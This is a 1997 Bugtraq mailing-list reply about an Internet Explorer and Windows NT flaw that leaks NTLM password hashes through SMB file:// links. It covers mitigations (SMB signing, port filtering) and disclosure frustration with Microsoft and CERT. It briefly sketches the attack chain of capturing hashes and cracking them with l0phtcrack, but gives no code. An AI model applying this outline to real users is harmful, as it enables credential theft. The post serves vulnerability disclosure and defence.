[4483] in bugtraq
Re: NT4.0 SP3 Still vulnerable
daemon@ATHENA.MIT.EDU (Rubens Kuhl Jr.)
Fri May 16 01:13:39 1997
Date: Thu, 15 May 1997 22:15:43 -0300
Reply-To: "Rubens Kuhl Jr." <rkuhljr@PUERIDOMUS.BR>
From: "Rubens Kuhl Jr." <rkuhljr@PUERIDOMUS.BR>
X-To: Aaron Spangler <pokee@MAXWELL.EE.WASHINGTON.EDU>
To: BUGTRAQ@NETSPACE.ORG
| I reported an Internet Explorer Security hole more than 2 months ago to
| Microsoft. The bug allows Websites to capture usernames and encrypted
| passwords from unsuspecing Windows NT users who have Internet Explorer.
|
| At first Microsoft told me they would Patch Internet Explorer. Then
| Internet Explorer 3.02 which was supposed to fix ALL of the security
| holes from that month. (According to MS's Web page)
|
| But IE 3.02 did not fix the security hole!
|
| Then Microsoft told me that NT 4.0 Service Pack 3 will definitely fix the
| whole.
|
| I just downloaded it. It does NOT fix the security hole!
As far as I know, IE 3.02 corrected only sending NTLM logins thru HTTP
connections, and I suppose you are talking about capturing
username/password hashes sent via SMB/CIFS (file://aaa.bbb.ccc.ddd).
I'm still downloading SP3, but after a look at the readme it looked me that
SP3 could empower a administrator to fix such bug by enabling the SMB
signing feature; it would not fix it at installation.
And with or without SP3, filtering routers blocking 135/137/138/139 ports
make this exploit and similar ones limited to Intranets.
| To date, microsoft has not fixed this and similiar security holes! Maybe
a
| expoit code release to BUGTRAQ is in order to help speed things up.
Hasn't one exploit code been released to SAMBA-DIGEST ? It captures the
password hashes, which someone could pass to l0phtcrack and similar
crackers.
Other exploits such as real-time password cracking hasn't been released,
but I'm not sure if such release would make Microsoft go faster.
| By the way, I have been conversing with CERT the last 2 months, and they
| still believe that Microsoft will fix the problem and CERT does not want
| to issue an Advisory until the bug is fixed. However CERT should atleast
be
| notifing administrators to warn users not to use Internet Explorer until
| this bug is fixed.
I think that's why BugTraq exists.
Rubens Kuhl Jr.
